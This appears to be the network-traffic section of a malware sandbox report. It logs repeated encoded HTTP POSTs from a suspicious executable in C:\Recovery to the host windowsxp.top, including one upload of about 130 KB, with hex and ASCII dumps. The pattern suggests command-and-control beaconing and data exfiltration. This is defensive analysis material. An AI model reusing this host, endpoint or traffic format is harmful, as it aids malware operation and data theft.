                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:43.859299898 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:43.866652012 CET384OUTData Raw: 50 56 58 55 5b 58 56 54 54 58 57 54 54 5d 5b 53 59 5c 5b 51 52 53 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXU[XVTTXWTT][SY\[QRSR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y%X X6:%66$_.3$-- > 2?;=;[*<),?!Y##X(
                                                                                                                  Oct 27, 2024 19:22:44.171400070 CET919INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksiV7l4eS4XCVvVmRBFPXMJApSkx%2F5WB1K6kMPKd00Ibv1zRUJsUJsKIcb1PFOJf37y1ThfeFGqKM5sCre05Hoxg303QsgNekwKZl4KZG4ThLFnk2y4iyAxOD2HZKsUi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b693bca3e54a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2169&recv_bytes=1392&delivery_rate=3719178&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 1a 20 10 2c 55 3d 3f 2a 0d 2a 0f 0c 02 27 2c 31 58 2c 0c 38 58 29 03 14 0d 39 16 32 55 24 27 31 41 3c 2a 24 5f 34 07 38 54 3d 0f 21 5e 00 1c 24 05 21 07 26 0b 25 15 05 04 27 33 3c 5a 36 3e 24 00 2a 3e 25 50 3f 5f 3f 03 3c 28 2b 1a 2c 3f 31 51 32 29 32 5a 2f 3b 21 07 2b 2a 2a 54 0c 14 22 04 3a 3f 16 5e 22 31 3e 0f 2a 0b 28 10 24 2e 30 56 33 2a 02 52 2b 05 3b 1b 3c 2d 14 02 35 2c 3c 1f 28 3b 22 5e 27 5b 37 10 3d 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98" ,U=?**',1X,8X)92U$'1A<*$_48T=!^$!&%'3<Z6>$*>%P?_?<(+,?1Q2)2Z/;!+**T":?^"1>*($.0V3*R+;<-5,<(;"^'[7=>"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449742188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:44.954720974 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:45.305644989 CET1012OUTData Raw: 55 5a 58 5c 5b 5e 56 56 54 58 57 54 54 50 5b 59 59 5e 5b 59 52 53 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZX\[^VVTXWTTP[YY^[YRSR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&=,_"\&!<]-_%8<V->$S(/ #_8>4?<*-/!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:45.549926996 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:45.852617979 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tYZ7RSdACfc9T0wGOFvEw9xBA7aza40hMkarTafnKOcjGLeF3hZwvrSSqq36uqSbDjnlQSf8HIiwH%2F%2BrYajMC%2F5v11bUYsWvKa37aRX%2Bb0taBXBUIoC%2FFJSyFzMGHu4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b69e4a5be762-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1343228&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449743188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:45.000946045 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1712
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:45.352305889 CET1712OUTData Raw: 55 50 58 5f 5e 58 53 53 54 58 57 54 54 52 5b 59 59 5c 5b 58 52 52 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX_^XSSTXWTTR[YY\[XRRR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'16#5'.?%888?=,U !8/=>>9!Y##X(
                                                                                                                  Oct 27, 2024 19:22:45.597021103 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:45.904166937 CET760INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgNPc%2F8blPJ93n8wBB2IX5VkelPDKA8HXaHHWX7uyOITQaDOHLwnaHNrCWVmEm%2Bfe0HyqlGvsAIRCWJWMFc%2BifZg1bzYGcNvmE9brpEGmdvwMoZ4tGrNS7uCfpg%2BSvwZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b69e9a372fe8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2033&delivery_rate=1328440&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Oct 27, 2024 19:22:45.904325962 CET163INData Raw: 39 38 0d 0a 03 1a 22 5f 37 3d 20 11 28 2c 2a 0d 29 1f 0b 59 25 2c 2e 03 2f 1c 38 12 28 2d 39 56 2f 38 3d 0e 24 34 35 45 28 29 2b 02 37 2d 38 1c 3e 25 21 5e 00 1c 27 17 20 3e 3a 0f 32 3b 33 05 27 1e 0a 5d 22 2d 11 17 29 3e 2d 51 3c 07 23 02 3f 3b
                                                                                                                  Data Ascii: 98"_7= (,*)Y%,./8(-9V/8=$45E()+7-8>%!^' >:2;3']"-)>-Q<#?;/S/Y2%*.Y8->**T"-Y Z6"9("(3> ')(W???6"<8]+()0,*"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449744188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:46.355181932 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:46.712167025 CET1008OUTData Raw: 55 5a 5d 58 5e 5d 56 52 54 58 57 54 54 55 5b 59 59 51 5b 5d 52 52 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]X^]VRTXWTTU[YYQ[]RRRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.#"^!&8^:738$/X+)?##!',#*%9!Y##X(/
                                                                                                                  Oct 27, 2024 19:22:46.953052998 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:47.264524937 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRE7%2FOZUl58ScIGqjFkfR2%2BcadqpbID6HCxnPq4umqx8Kux7Lvia8YxBI3ysxSr4mcPux6lqTua7uYuFb9kiv2U0A4%2B4XkgTnRkNkjywYcRr1rZboBtmwLdaNvpeJqfY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6a71e030c1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1817&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=794731&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.449746188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:47.457740068 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:47.805830002 CET1012OUTData Raw: 55 56 58 5e 5b 5e 53 53 54 58 57 54 54 52 5b 5c 59 5b 5b 5e 52 5e 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX^[^SSTXWTTR[\Y[[^R^R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1<5*2"&\9$4$88W/>+ ^,[ *<9/!Y##X(
                                                                                                                  Oct 27, 2024 19:22:48.058985949 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:48.371516943 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HR%2FkCOTxH5hPV8OQPNGcvKCbt1y5dCZaS%2BLemk6lBgByCixWLysC0iOtyddqUX2N2LiN%2BbDLC%2B8xdjHfPZxcLY0swhm19OOfNb1zcEOcYmeAQb80WkCw2AY67ViJCBLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6adff066ba0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1279151&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.449747188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:48.663537979 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:49.008608103 CET1012OUTData Raw: 50 52 58 5c 5b 5b 56 54 54 58 57 54 54 50 5b 5e 59 5a 5b 5e 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRX\[[VTTXWTTP[^YZ[^R^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1(")%66(:0++,'(/#$-.()<&:!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:49.264313936 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:49.582602978 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clqTg8OjFLv%2BkUmLr0Kx4KH1lwKwLNPY6jKLgMY%2FxkBdSuXT%2FYRevGpXgP31EhKU%2FLtKbJ2WjG%2FyOyuW7uSB3hpzWnZZkCWGG7WN6nvE94sDiqeozfEUmXPjkLzM5xQQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6b58c344695-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1965&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=738022&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.449750188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:49.780354023 CET347OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 130940
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:50.150188923 CET12360OUTData Raw: 55 54 58 54 5e 59 53 57 54 58 57 54 54 5c 5b 5f 59 5d 5b 5d 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UTXT^YSWTXWTT\[_Y][]RQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2> Y5:)^66#.B '(;X#=?/713Z8=0*,:?!Y##X(
                                                                                                                  Oct 27, 2024 19:22:50.155922890 CET2472OUTData Raw: 22 28 50 5a 10 07 53 16 07 2e 26 33 3a 5f 13 02 00 07 31 07 13 2d 0f 56 3b 2a 5d 1a 36 2f 3f 06 0f 1f 2a 3e 02 25 05 3e 24 10 2c 1a 26 28 2f 37 03 03 34 2f 34 3f 14 11 24 5a 3b 3f 37 3a 29 5f 3f 13 06 58 28 14 1f 29 25 55 31 22 27 5a 11 59 0e 10
                                                                                                                  Data Ascii: "(PZS.&3:_1-V;*]6/?*>%>$,&(/74/4?$Z;?7:)_?X()%U1"'ZY7#S(>,U;).>=+#=;U'!?\ 2?>^>46846?#!\?V5/;66$P4T03_><!14*?3+<=88(2 C%;0[%>ZW*022#202=+31+2)3@.5?/<R>5Q+17..27?
                                                                                                                  Oct 27, 2024 19:22:50.155976057 CET4944OUTData Raw: 3b 5f 27 5a 31 03 2c 03 00 24 26 16 3a 0a 3a 5d 34 08 21 5b 3c 3d 54 24 02 2f 13 12 30 21 3e 3a 27 20 00 39 34 0b 11 3d 29 07 17 17 03 24 31 3f 0a 41 32 3d 05 07 05 1b 34 5a 3b 0c 37 56 51 5d 06 1f 06 1f 0b 3c 0b 19 23 5f 2f 2a 0e 32 3b 3a 20 5b
                                                                                                                  Data Ascii: ;_'Z1,$&::]4![<=T$/0!>:' 94=)$1?A2=4Z;7VQ]<#_/*2;: [<"/XW;8;$1&19\!-)R$"<Z:2<.+3!241?Y <3)04.A + +:Z=$(_-5%0Y>.2;*U#!_4>\0<:><9#%<("_+7;(#\A)"%43',,[>X(<(1=(#X%
                                                                                                                  Oct 27, 2024 19:22:50.156121969 CET2472OUTData Raw: 22 3e 16 15 31 04 22 35 27 04 50 2c 15 07 20 35 35 3e 32 15 0d 35 07 13 01 5e 22 5a 2b 59 2d 20 24 2a 10 5c 36 3d 23 3d 3d 57 22 32 35 33 09 1a 3d 00 37 0e 3b 03 2b 21 31 3e 1e 1a 31 02 3e 11 3c 2f 09 30 36 3a 29 1e 3f 58 38 24 3e 5c 31 33 39 0d
                                                                                                                  Data Ascii: ">1"5'P, 55>25^"Z+Y- $*\6=#==W"253=7;+!1>1></06:)?X8$>\139)?];1.<_#"'^:8<-<_.V<&349='T [$;.:?/]99X'$06)?IQ<4T4#^X4.Z<Z4("']8 %? 68^1<^24>&7Q+%?#+0/2()WY9"&/T,=,!-];;*3;#-:;"
                                                                                                                  Oct 27, 2024 19:22:50.156166077 CET4944OUTData Raw: 33 38 27 11 39 21 02 26 3b 05 24 18 24 2e 30 18 3d 42 31 5d 23 54 1c 5d 33 53 3d 06 3b 07 5c 13 05 3e 32 30 06 22 22 10 27 58 3e 05 34 56 11 11 05 5b 04 0a 01 39 1b 22 3b 43 32 2b 02 5f 19 5d 3a 2d 19 34 33 0d 0b 59 07 08 24 26 0b 07 31 52 3c 29
                                                                                                                  Data Ascii: 38'9!&;$$.0=B1]#T]3S=;\>20""'X>4V[9";C2+_]:-43Y$&1R<);_,%8C"- ^ \83,V=;=/6Y'<Q 1??]:19SV@8=4Q08,W(-($[ ?:>%.-=:4Z)?/>8?'1"9]006:T'7>[R30?X9(;>?:6270%#0: 5>)28
                                                                                                                  Oct 27, 2024 19:22:50.156193018 CET2472OUTData Raw: 0c 04 0d 20 30 3c 33 2c 36 3d 34 35 3e 3d 0c 08 23 07 3b 1b 27 5e 5f 34 2f 5b 32 3d 3e 2a 2d 59 36 5e 1f 22 15 10 17 37 3f 2a 04 20 30 59 45 1d 36 22 45 1f 32 22 37 2f 3e 22 28 18 27 3b 2b 33 04 2d 56 5f 3c 05 18 04 0a 2c 3f 1b 06 34 22 5d 3c 10
                                                                                                                  Data Ascii: 0<3,6=45>=#;'^_4/[2=>*-Y6^"7?* 0YE6"E2"7/>"(';+3-V_<,?4"]<Y0=$3" [X]7,U<2);#&Y=\#-W"<Y$; :/<Z)"/7T?B700-\ 5#;4$",<X^:>=?]3<>38Z/1_<0"93Y4ZP*-P*0_9=VP;1X6;2(;/X
                                                                                                                  Oct 27, 2024 19:22:50.156286001 CET4944OUTData Raw: 14 59 1f 18 2c 3b 3e 36 3a 5c 30 23 27 3d 02 5f 2c 00 12 11 38 03 20 1b 2f 42 18 06 3c 08 07 5c 07 24 53 14 23 01 01 13 35 58 08 20 32 54 3e 32 0f 04 0b 5c 2c 33 50 31 34 3e 45 2a 33 5e 25 0f 3f 42 32 40 31 06 5c 1c 3f 06 23 0c 05 20 00 1d 33 08
                                                                                                                  Data Ascii: Y,;>6:\0#'=_,8 /B<\$S#5X 2T>2\,3P14>E*3^%?B2@1\?# 3$X!.>'&V,;1<52?Q*\?^S/.X==+X1(?.V58:4D51=.#><7"508!:";U]4:)%=?3?V:=9/.\"]P%'1],<+R)2#8-$\4'/^H$4_9?1";
                                                                                                                  Oct 27, 2024 19:22:50.156318903 CET2472OUTData Raw: 32 21 3b 16 3a 3d 58 57 3e 3a 2f 24 0b 0f 3f 1b 22 59 16 1d 30 22 22 0d 26 35 33 04 27 00 1a 56 03 58 00 1c 3c 2b 0f 28 03 5e 17 1a 2b 5b 25 0d 0d 17 00 2c 07 5a 23 25 3b 31 25 57 03 0b 48 04 0a 3f 11 29 30 00 15 2f 30 5b 2c 2e 32 03 14 30 38 2f
                                                                                                                  Data Ascii: 2!;:=XW>:/$?"Y0""&53'VX<+(^+[%,Z#%;1%WH?)0/0[,.208/5%8+9!1 %0?Y+3<#_\?:*Q%:V><Q"<#)/?9:$ S'0'\$+1,<>P#U$]4>^<Z;"*;_.?8*$]:Z(X5^? &+#-P-1Y!T5^$;Q"85^6&)^'*
                                                                                                                  Oct 27, 2024 19:22:50.161550045 CET2472OUTData Raw: 38 31 24 59 31 2c 43 24 25 58 57 12 06 06 2d 15 24 38 23 5d 3c 5a 3f 1d 36 39 0e 2e 31 21 06 1f 36 43 45 24 26 09 59 3c 28 0e 2d 3c 3e 3d 2b 21 31 05 36 33 34 30 51 5e 24 2c 00 33 03 56 0d 06 06 04 25 50 03 29 5a 2a 24 25 13 07 28 5d 05 1b 39 3d
                                                                                                                  Data Ascii: 81$Y1,C$%XW-$8#]<Z?69.1!6CE$&Y<(-<>=+!16340Q^$,3V%P)Z*$%(]9='59714=&7'*_3<Z:[4*='9?:(4#1&*%>8W^?:Z8>Y@5> 2#+30Z*$U+?4<E>60#()%%!791>"R&0;%7Z6975#$U$4]?9 ?(4.!U++2-7?=>?1(+
                                                                                                                  Oct 27, 2024 19:22:50.161676884 CET2472OUTData Raw: 35 5a 23 11 2b 06 21 3d 3d 02 1a 03 05 5c 0f 2b 0f 0c 29 0b 33 2d 06 58 22 3c 36 3b 0b 06 0d 2c 2b 32 20 01 3d 06 34 39 25 5e 18 14 27 29 01 08 0b 3e 24 0c 0b 55 5b 05 26 2b 2c 3c 0b 3d 2b 2f 39 04 36 3b 21 0e 09 36 2e 1b 1d 17 39 5c 3c 1c 2c 59
                                                                                                                  Data Ascii: 5Z#+!==\+)3-X"<6;,+2 =49%^')>$U[&+,<=+/96;!6.9\<,Y;W2[#,8!8[4"$ %:\6:096>,>&&0".36!5<P2:Y=>"-.0;.>="'7:10;5B<3Z16T"2%3&,K\,.!5/:'9^R,9:%9)([V$.Q!0[D="-S+V;_:Z3
                                                                                                                  Oct 27, 2024 19:22:50.383308887 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.449751188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:49.811465979 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
